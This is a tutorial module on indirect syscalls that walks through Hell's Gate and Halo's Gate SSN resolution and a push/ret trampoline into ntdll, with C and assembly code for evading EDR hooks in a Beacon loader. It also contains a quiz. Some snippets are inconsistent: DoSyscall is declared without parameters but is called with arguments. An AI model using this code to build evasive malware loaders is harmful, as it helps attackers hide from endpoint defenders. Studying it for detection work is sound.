Difficulty: Intermediate

Module 4: LibGate — Indirect Syscalls

RecycledGate lineage, the SYSCALL_GATE structure, Hell's Gate + Halo's Gate SSN extraction, and the push/ret trampoline for executing syscalls from ntdll's address space.

Module Objective

Understand why indirect syscalls exist, how LibGate resolves System Service Numbers from clean and hooked stubs, and how the push; ret trampoline redirects execution into ntdll so the kernel sees a legitimate return address. By the end of this module you will be able to trace the full path from GetSyscall() through PrepareSyscall() and DoSyscall() to the kernel transition.

1. Why Indirect Syscalls?

Direct syscalls were the first evolution beyond calling hooked ntdll stubs. By embedding the syscall instruction (opcode 0F 05) directly in the malware's .text section, early tools like SysWhispers1 and Hell's Gate avoided EDR inline hooks entirely. But direct syscalls introduced three new detection vectors:

Indirect syscalls solve all three problems by jumping to a syscall; ret gadget inside ntdll. The actual syscall instruction executes from ntdll's address space, so the return address points into ntdll, the 0F 05 bytes live in a legitimate module, and the call stack contains an ntdll frame.

Direct Syscall
  • syscall instruction in attacker's .text
  • Return address points to attacker code
  • No ntdll frame on the call stack
  • 0F 05 bytes in non-ntdll module
  • Detected by InstrumentationCallback
Indirect Syscall
  • syscall instruction inside ntdll's memory
  • Return address points into ntdll
  • ntdll frame present on the stack
  • 0F 05 bytes in legitimate module
  • Passes InstrumentationCallback checks

2. RecycledGate — The Origin

LibGate descends from RecycledGate, created by thefLink (github.com/thefLink/RecycledGate). RecycledGate was one of the first public implementations that combined two techniques:

RecycledGate combined these two SSN resolution strategies with indirect syscall trampolining — instead of executing the syscall instruction in its own code, it jumps to the syscall; ret gadget inside ntdll's own stub. The name "Recycled" refers to reusing ntdll's own syscall gadgets rather than embedding new ones.

From RecycledGate to LibGate

RecycledGate used internal djb2 hash resolution to find target functions in ntdll's export table. LibGate, rasta-mouse's Crystal Palace port, removes this coupling. Instead of hashing internally, LibGate takes the ntdll base address and function pointer as external parameters, resolved by the caller via the Crystal Palace DFR (Dynamic Function Resolution) system. This makes LibGate hash-algorithm-agnostic — the caller can use djb2, ROR13, CRC32, or any other hash to find the function before passing it to LibGate.

3. LibGate Architecture

LibGate is rasta-mouse's Crystal Palace port of RecycledGate. The API is declared in gate.h, and the implementation is provided as a precompiled library shipped inside libgate.x64.zip. The entire API surface consists of one structure and three functions.

The SYSCALL_GATE Structure

C (gate.h)typedef struct {
    DWORD ssn;       // System Service Number (index into SSDT)
    PVOID jmpAddr;   // Address of syscall;ret gadget inside ntdll
} SYSCALL_GATE;

This structure is the output of SSN resolution. It stores everything needed to execute an indirect syscall: the SSN to load into EAX, and the address to jump to for the actual syscall instruction.

The Three Functions

C (gate.h)// Resolve the SSN and syscall gadget address for a given Nt* function
BOOL GetSyscall     (PVOID ntdll, PVOID func, SYSCALL_GATE * gate);

// Stage the SSN and jump address in registers (r11, r10)
void PrepareSyscall (DWORD ssn, PVOID addr);

// Execute the syscall via push/ret trampoline
void DoSyscall      ();

Key Architectural Difference

GetSyscall() takes the ntdll base address and function pointer as parameters. These are resolved externally by the caller — typically via Crystal Palace's DFR directive. RecycledGate resolved these internally using djb2 hashing. By externalizing resolution, LibGate becomes a pure syscall execution engine that is independent of any specific function resolution strategy.

4. GetSyscall() — The Core Algorithm

The GetSyscall() function resolves the SSN and locates the indirect syscall gadget. It follows a four-step process: pattern match the target stub, detect hooks, search neighbors if hooked, and find the syscall; ret gadget address.

Step 1 — Pattern Match (Hell's Gate)

The function first checks the target stub's leading bytes for the clean (unhooked) pattern:

Byte PatternOffset  Bytes          Instruction
------  -------------  ----------------------------
0x00    4C 8B D1       mov r10, rcx
0x03    B8 xx xx       mov eax, <SSN_LO> <SSN_HI>
0x05    00 00          (upper bytes, always 0 for valid SSNs < 0x200)

If the first four bytes match 4C 8B D1 B8, the stub is clean. The SSN is extracted from bytes 4 and 5:

C (Hell's Gate Check)// Check for clean stub signature: 4C 8B D1 B8
PBYTE stub = (PBYTE)func;

if (stub[0] == 0x4C &&    // mov r10, rcx (byte 1)
    stub[1] == 0x8B &&    // mov r10, rcx (byte 2)
    stub[2] == 0xD1 &&    // mov r10, rcx (byte 3)
    stub[3] == 0xB8 &&    // mov eax, imm32 (opcode)
    stub[6] == 0x00 &&    // upper bytes of SSN must be zero
    stub[7] == 0x00)       // (valid SSNs are < 0x200)
{
    // SSN is the 16-bit little-endian value at offset 4-5
    gate->ssn = (stub[5] << 8) | stub[4];
    // ... proceed to find syscall;ret gadget
}

Step 2 — Hook Detection

In the actual RecycledGate source, Steps 1 and 2 are interleaved inside a single scanning loop. Each iteration checks for three conditions in order: (1) whether the stub is hooked (0xE9 JMP opcode), (2) whether a 0xC3 (RET) opcode is encountered — which signals early termination of the scan since the stub boundary has been reached — and (3) whether the clean 4C 8B D1 B8 pattern matches. They are presented here as separate steps for clarity, but understand they execute as one loop in practice.

C (Hook Detection - within the scanning loop)BOOL bHooked = FALSE;

// 0xE9 = JMP rel32 (5-byte relative jump) - stub is hooked
if (stub[0] == 0xE9) {
    bHooked = TRUE;
    // Cannot extract SSN from this stub - bytes are overwritten
    // Fall through to neighbor search (Halo's Gate)
}

// 0xC3 = RET opcode - early termination of the scan
// If we hit a ret before finding the pattern, stop searching
if (stub[0] == 0xC3) {
    // Stub boundary reached; abort scan
    return FALSE;
}

Step 3 — Neighbor Search (Halo's Gate)

When the target stub is hooked, LibGate searches neighboring stubs. In ntdll, syscall stubs are laid out sequentially at 32-byte intervals, and SSNs are consecutive. If the stub at offset +2 (64 bytes later) is clean and has SSN 0x1A, then the target stub's SSN is 0x1A - 2 = 0x18.

C (Halo's Gate - Neighbor Search)if (bHooked) {
    // Single loop: check BOTH directions per iteration
    // Bounded by the number of exported functions, with boundary checks
    for (DWORD i = 1; i < pExportDir->NumberOfFunctions; i++) {

        // Search DOWN: neighbor at stub + (i * 32)
        PBYTE neighborDown = stub + (i * 32);
        if (neighborDown[0] == 0x4C &&
            neighborDown[1] == 0x8B &&
            neighborDown[2] == 0xD1 &&
            neighborDown[3] == 0xB8)
        {
            // Clean neighbor found below
            // neighbor SSN - i = our SSN (SSNs are sequential)
            gate->ssn = ((neighborDown[5] << 8) | neighborDown[4]) - i;
            break;
        }

        // Search UP: neighbor at stub - (i * 32)
        PBYTE neighborUp = stub - (i * 32);
        if (neighborUp[0] == 0x4C &&
            neighborUp[1] == 0x8B &&
            neighborUp[2] == 0xD1 &&
            neighborUp[3] == 0xB8)
        {
            // Clean neighbor found above
            // neighbor SSN + i = our SSN
            gate->ssn = ((neighborUp[5] << 8) | neighborUp[4]) + i;
            break;
        }
    }
}

Why Neighbor Search Works

EDRs hook selectively. Out of 400+ Nt* syscall stubs in ntdll, an EDR typically hooks only the high-value targets: NtAllocateVirtualMemory, NtWriteVirtualMemory, NtCreateThread, etc. Hooking every stub would cause severe performance degradation. There are always unhooked neighbors within a few stubs of any hooked target.

Step 4 — Find the syscall;ret Gadget

Whether the SSN came from the target stub (Step 1) or a neighbor (Step 3), LibGate now needs the address of the syscall; ret instruction sequence within the resolved stub. It scans for the three-byte pattern 0F 05 C3:

C (Gadget Search)// If the stub was hooked, pStub has already been reassigned
// to the clean neighbor's address during the Halo's Gate search.
// The gadget search operates on whichever stub pStub points to.

for (DWORD offset = 0; offset < 32; offset++) {
    if (pStub[offset]     == 0x0F &&   // syscall (byte 1)
        pStub[offset + 1] == 0x05 &&   // syscall (byte 2)
        pStub[offset + 2] == 0xC3)     // ret
    {
        gate->jmpAddr = &pStub[offset]; // Address of syscall;ret in ntdll
        break;
    }
}

The jmpAddr now points to the 0F 05 C3 bytes inside ntdll's memory. When execution jumps here, the CPU will execute syscall from ntdll's address range and then ret back to the caller.

GetSyscall() Resolution Flow

Read stub
bytes at func
Pattern match
4C 8B D1 B8?
Hook check
byte[0] == E9?
Neighbor scan
±32-byte stubs
Find 0F 05 C3
syscall;ret gadget

5. The Push/Ret Trampoline

Once GetSyscall() has resolved the SSN and gadget address, the caller uses PrepareSyscall() and DoSyscall() to actually execute the syscall. These two functions implement a push/ret trampoline — a technique that uses the stack to redirect execution into ntdll without a direct jmp.

PrepareSyscall — Stage the Registers

x86-64 ASM; PrepareSyscall(DWORD ssn, PVOID addr)
; Windows x64 calling convention: ecx = ssn, rdx = addr
PrepareSyscall:
    xor  r11, r11          ; Zero r11
    xor  r10, r10          ; Zero r10
    mov  r11, rcx          ; r11  = SSN (first param)
    mov  r10, rdx          ; r10  = jmpAddr (second param, ntdll gadget)
    ret                    ; Return to caller

DoSyscall — Execute via Push/Ret

x86-64 ASM; DoSyscall()
; Called after PrepareSyscall staged r11 (SSN) and r10 (jmpAddr)
; The caller has already placed syscall arguments in RCX, RDX, R8, R9
DoSyscall:
    push r10               ; Push ntdll gadget address onto the stack
    xor  rax, rax          ; Zero rax
    mov  r10, rcx          ; r10 = rcx (Windows syscall ABI: kernel reads arg1 from r10)
    mov  eax, r11d         ; eax = SSN (System Service Number)
    ret                    ; Pop ntdll gadget address into RIP → jump to syscall;ret

The critical trick is in the last two instructions: push r10 places the ntdll gadget address on top of the stack, and ret pops it into RIP. The CPU now executes from ntdll's syscall; ret sequence. After the kernel returns, the ret in ntdll's gadget pops the original return address (placed by the caller of DoSyscall) and returns control to the loader.

Push/Ret Trampoline — Full Execution Flow

1. Caller invokes PrepareSyscall(ssn, jmpAddr) → stores SSN in r11, gadget addr in r10
2. Caller sets up RCX, RDX, R8, R9 with the actual syscall arguments
3. Caller invokes DoSyscall()
4. DoSyscall pushes r10 (ntdll gadget address) onto the stack
5. Sets r10 = rcx (Windows ABI: kernel reads 1st arg from r10), eax = SSN
6. ret pops ntdll gadget address into RIP — CPU jumps to ntdll
7. CPU executes syscall from ntdll's address space
8. Kernel transition: kernel sees return address in ntdll — passes validation
9. Kernel returns, ntdll's ret pops the original return address
10. Execution returns to the original caller cleanly

Why Push/Ret Instead of JMP?

A jmp r10 would also redirect execution to ntdll, but it does not place a return address on the stack. The syscall; ret gadget in ntdll ends with ret, which pops the top of the stack into RIP. With push r10; ... ret, the stack is set up so that:

The two ret instructions chain together naturally through the stack, giving clean bidirectional control flow.

6. LibGate in GCC Inline Assembly

Crystal Palace builds with MinGW (GCC), not MSVC. This matters because MSVC does not support inline x64 assembly at all. MinGW does, using GCC's inline assembly syntax. LibGate uses the __attribute__((naked)) function attribute to emit pure assembly without compiler-generated prologue/epilogue code:

C (gate.c - GCC Inline ASM)__attribute__((naked)) void PrepareSyscall(DWORD ssn, PVOID addr) {
    __asm__(
        "xor %%r11, %%r11\n"
        "xor %%r10, %%r10\n"
        "mov %%rcx, %%r11\n"
        "mov %%rdx, %%r10\n"
        "ret\n"
    );
}

__attribute__((naked)) void DoSyscall() {
    __asm__(
        "push %%r10\n"
        "xor %%rax, %%rax\n"
        "mov %%rcx, %%r10\n"
        "mov %%r11d, %%eax\n"
        "ret\n"
    );
}

AT&T vs Intel Syntax

GCC uses AT&T syntax by default (registers prefixed with %%, source-destination order reversed). However, the Crystal Palace build system can pass the -masm=intel flag to switch to Intel syntax. With that flag, the assembly looks identical to the MASM/NASM style shown in Section 5. The naked attribute ensures the compiler emits no prologue (push rbp; mov rbp, rsp) or epilogue (pop rbp; ret) — the function body is purely what the programmer writes.

This GCC requirement is why Crystal-Loaders (and Crystal Palace in general) targets the MinGW toolchain. The entire build pipeline — from COFF object compilation through PIC linking — uses GCC and its associated linker, not the MSVC toolchain.

7. Technique Comparison

LibGate sits in the lineage of syscall evasion techniques. This table shows how it compares to prior art across the key dimensions: SSN resolution method, execution strategy, hook bypass capability, and where the return address points after the syscall.

TechniqueSSN SourceExecutionHook BypassReturn Addr
Hell's GateStub pattern matchDirect syscallNo (fails if hooked)In malware
Halo's GateNeighbor searchDirect syscallYesIn malware
SysWhispers2Sort by addressDirect syscallYesIn malware
SysWhispers3Sort by addressIndirect (jmp ntdll)YesIn ntdll
RecycledGateHell+Halo patternIndirect (push;ret)YesIn ntdll
LibGateHell+Halo (external resolve)Indirect (push;ret)YesIn ntdll

The key evolution across these techniques is twofold: first, from failing on hooks (Hell's Gate) to handling hooks gracefully (Halo's Gate, SysWhispers2); second, from direct execution (return address in malware) to indirect execution (return address in ntdll). LibGate combines both advances while decoupling from any specific hash algorithm.

8. Usage Pattern in Crystal-Loaders

In the Crystal-Loaders codebase, LibGate is not called directly by the main loader code. Instead, a wrapper function ResolveSyscallEntry() bridges the DFR-resolved function pointer and LibGate's GetSyscall():

C (Crystal-Loaders)void ResolveSyscallEntry(PVOID ntdll, PVOID func, SYSCALL_API_ENTRY * entry)
{
    SYSCALL_GATE gate;
    memset(&gate, 0, sizeof(SYSCALL_GATE));

    if (GetSyscall(ntdll, func, &gate))
    {
        entry->fnAddr  = func;       // Original function address (for reference)
        entry->sysnum  = gate.ssn;   // Resolved System Service Number
        entry->jmpAddr = gate.jmpAddr; // ntdll syscall;ret gadget address
    }
}

The SYSCALL_API_ENTRY structure stores the resolved data for later use. When the loader needs to execute a syscall (for example, NtAllocateVirtualMemory to map memory for the Beacon payload), it follows this sequence:

C (Calling Pattern)// 1. Prepare - stage SSN and gadget address in r11/r10
PrepareSyscall(entry->sysnum, entry->jmpAddr);

// 2. Execute - the compiler places NtAllocateVirtualMemory's args
//    in RCX, RDX, R8, R9 per the x64 calling convention,
//    then DoSyscall() trampolines into ntdll
NTSTATUS status = DoSyscall(
    hProcess,          // RCX → ProcessHandle
    &baseAddress,      // RDX → *BaseAddress
    0,                 // R8  → ZeroBits
    &regionSize,       // R9  → *RegionSize
    MEM_COMMIT | MEM_RESERVE,  // [rsp+0x28]
    PAGE_READWRITE             // [rsp+0x30]
);

The Complete Chain

Putting it all together, the Crystal-Loaders syscall path is:

  1. DFR resolves the ntdll base and target function address (hash-agnostic)
  2. GetSyscall() extracts the SSN via Hell's Gate / Halo's Gate and locates the syscall;ret gadget
  3. PrepareSyscall() stages the SSN and gadget address in r11/r10
  4. DoSyscall() trampolines execution into ntdll via push; ret
  5. The kernel sees a return address inside ntdll — everything looks legitimate

Module 4 Quiz: LibGate — Indirect Syscalls

Q1: Why does LibGate's DoSyscall use push r10; ... ret instead of jmp r10?

The push r10; ret pattern places the ntdll gadget address on the stack, then ret pops it into RIP to redirect execution. Crucially, this leaves the caller's original return address as the next entry on the stack. After ntdll's syscall; ret executes, that second ret pops the original return address, returning control to the loader cleanly. A jmp r10 would jump to ntdll but would not set up the stack correctly for the return path.

Q2: How does Halo's Gate resolve an SSN when the target stub is hooked?

Syscall stubs in ntdll are laid out sequentially at 32-byte intervals with consecutive SSNs. Halo's Gate searches neighboring stubs in both directions (±32, ±64, ±96, etc.) until it finds one that is not hooked. It then reads that neighbor's SSN and adjusts it by the distance (in stub count) to compute the target's SSN. This works because EDRs only hook a subset of the 400+ available syscall stubs.

Q3: What makes LibGate different from the original RecycledGate?

RecycledGate uses an internal djb2 hash to resolve target functions from ntdll's export table. LibGate removes this coupling by accepting the ntdll base address and function pointer as external parameters, resolved by the caller (via Crystal Palace's DFR system). This makes LibGate hash-algorithm-agnostic — the caller can use any hash or resolution strategy to find the function before passing it to LibGate.